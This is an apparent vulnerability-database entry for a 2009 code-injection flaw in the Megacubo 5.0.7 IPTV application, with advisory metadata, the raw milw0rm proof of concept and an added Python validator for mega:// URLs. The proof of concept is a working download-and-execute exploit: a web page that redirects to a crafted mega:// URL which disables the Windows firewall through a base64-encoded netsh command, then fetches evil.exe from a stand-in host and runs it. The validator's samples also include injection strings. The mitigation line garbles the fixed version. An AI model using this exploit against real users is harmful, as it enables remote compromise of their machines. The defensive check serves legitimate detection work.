Vendor: Megacubo
By: JJunior
CVSS: 9.3 (HIGH)
Type: Remote Code Execution
CWE: 94
Product Name: Megacubo
Affected Version From: 5.0.7
Affected Version To: 5.0.7
Patch Exists: Yes
Related CWE: N/A
CPE: a:megacubo:megacubo:5.0.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer 7 and Mozilla Firefox 1.5 on Windows XP SP3
2009

Megacubo 5.0.7 download & Execute

A vulnerability in Megacubo 5.0.7 allows remote attackers to execute arbitrary code by using a malicious mega:// URL. The vulnerability is due to the application's failure to properly validate user-supplied input in that URL. An attacker can exploit it by enticing an unsuspecting user to click on a malicious URL or open a web page that navigates to one. Successful exploitation could result in the execution of arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Megacubo 5.0.7

Exploit-DB raw data:

Megacubo 5.0.7 download & Execute
by: JJunior
site: http://www.musicastop.com.br/

tested against Internet Explorer 7 and Mozilla Firefox 1.5 on Windows XP SP3

software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023
 
description:
"Megacubo is an IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows (2000,
XP and Vista)."
 
example exploit, download & Execute :
 

<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';
 
// disable firewall  encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';
 
shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';
 
// shell code
window.location=shellcode;

</script>
</body>
</html>

# milw0rm.com [2009-01-01]
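
Added defensive example (not code from Megacubo, the advisory author or Exploit-DB): a strict allow-list check for mega:// handler URLs that also flags the string-breakout characters seen in the proof of concept above, for use before the value reaches the application or when triaging captured URLs. The action|argument grammar, the allow-listed action set and the argument character set are assumptions inferred from the PoC string, not Megacubo's documented format.

```python
import re
from urllib.parse import unquote

# Assumption: handler URLs look like mega://<action>|<argument>, as in the PoC.
ALLOWED_ACTIONS = {"play"}   # hypothetical allow-list; only "play" appears on the page
SAFE_ARG = re.compile(r"[A-Za-z0-9 _\-]{1,64}")   # hypothetical channel-name charset
# Characters that let an argument break out of a quoted string and call functions.
INJECTION = re.compile(r"""["'`();$\\]""")

def check_mega_url(url):
    """Return (ok, reason); ok is True only for a strictly allow-listed URL."""
    decoded = url
    # Decode a few rounds so %22 or %2522 cannot hide a quote from the checks.
    # Anything still encoded afterwards contains '%' and fails SAFE_ARG.
    for _ in range(3):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    if not decoded.lower().startswith("mega://"):
        return False, "not a mega:// URL"
    action, sep, arg = decoded[len("mega://"):].partition("|")
    if not sep:
        return False, "missing action|argument separator"
    if action not in ALLOWED_ACTIONS:
        return False, "action not allow-listed"
    if INJECTION.search(arg):
        return False, "injection characters in argument"   # worth alerting on
    if not SAFE_ARG.fullmatch(arg):
        return False, "argument outside allow-listed character set"
    return True, "ok"

# Constructed sample inputs (not captured traffic).
SAMPLES = [
    "mega://play|Canal 1",
    'mega://play|con.."a()".phpinfo()."/?");print(',
    "mega://play|con..%2522a%2528%2529",
    "mega://delete|x",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_mega_url(sample), sample)
```
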